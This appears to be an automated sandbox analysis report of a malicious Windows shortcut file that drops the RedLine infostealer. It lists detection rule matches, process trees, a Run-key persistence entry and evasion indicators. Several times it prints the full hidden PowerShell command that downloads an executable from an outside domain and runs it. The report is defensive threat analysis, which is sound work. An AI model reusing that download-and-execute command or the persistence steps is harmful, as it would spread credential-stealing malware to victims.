                    Source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 2.2.svhost.exe.4760090.1.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.4760090.1.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.56e0000.5.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.42b0010.3.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.327507977.000001D9DA350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 00000000.00000002.327351810.000001D9DA340000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 00000000.00000002.381690727.000001D9F43C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 00000000.00000002.327507977.000001D9DA359000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FF8163D1660
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_0173EDB0
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_01736B49
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_0173716B
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_01731110
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_01736DC0
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_017310E0
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_017313C8
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_017313B9
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_056BF5D8
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_056B86B8
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_056B1070
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_056BCEF8
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_056B29E0
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_056BF5C9
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_056B86A9
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_056BCEE8
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_05A56EB0
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_05A50007
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_05A50040
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_05A56EA0
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0175FA30
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0175DE10
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0175D2F0
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057821D8
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_05781D98
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0578BE80
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057868F8
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_05782610
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_05780190
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057E5530
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057E7738
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057E772B
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057E4288
                    Source: svhost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Opgcxhsdw.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | ReversingLabs: Detection: 74%
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | Virustotal: Detection: 59%
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\svhost.exe "C:\Users\user\AppData\Roaming\svhost.exe"
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Process created: C:\Users\user\AppData\Roaming\svhost.exe C:\Users\user\AppData\Roaming\svhost.exe
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe"
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\svhost.exe "C:\Users\user\AppData\Roaming\svhost.exe"
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Process created: C:\Users\user\AppData\Roaming\svhost.exe C:\Users\user\AppData\Roaming\svhost.exe
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | LNK file: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\svhost.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2tkd4yp5.4vu.ps1
                    Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winLNK@18/15@3/2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3216:120:WilError_01
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                    Data Obfuscation

                    Source: Yara match | File source: 2.2.svhost.exe.5960000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.464775648.0000000005960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Opgcxhsdw.exe PID: 624, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Opgcxhsdw.exe PID: 5216, type: MEMORYSTR
                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_03106A52 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_03106A58 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 2_2_05A531EA push edx; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0578D45F push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0578FC20 push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0578D91B push A4057D3Eh; retf
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0578D839 push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0578D880 push edi; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0578D887 push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_0578FB90 push 8BD08B6Dh; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057EB5C0 push cs; ret
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057E87C3 push eax; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057EE1F2 push eax; retf
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057EE1F0 pushad ; retf
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057EE044 push eax; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057EE028 push ecx; iretd
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 7_2_057E7393 push esp; ret
                    Source: initial sample | Static PE information: section name: .text entropy: 7.998651527995621
                    Source: initial sample | Static PE information: section name: .text entropy: 7.998651527995621

                    Persistence and Installation Behavior

                    Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK file | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\svhost.exe
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | File created: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Opgcxhsdw

                    Hooking and other Techniques for Hiding and Protection

                    Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 7053
                    Source: unknown | Network traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: svhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2160 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svhost.exe TID: 5496 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164 Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780 Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 376 Thread sleep count: 4305 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\svhost.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9717
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9306
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9158
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4305
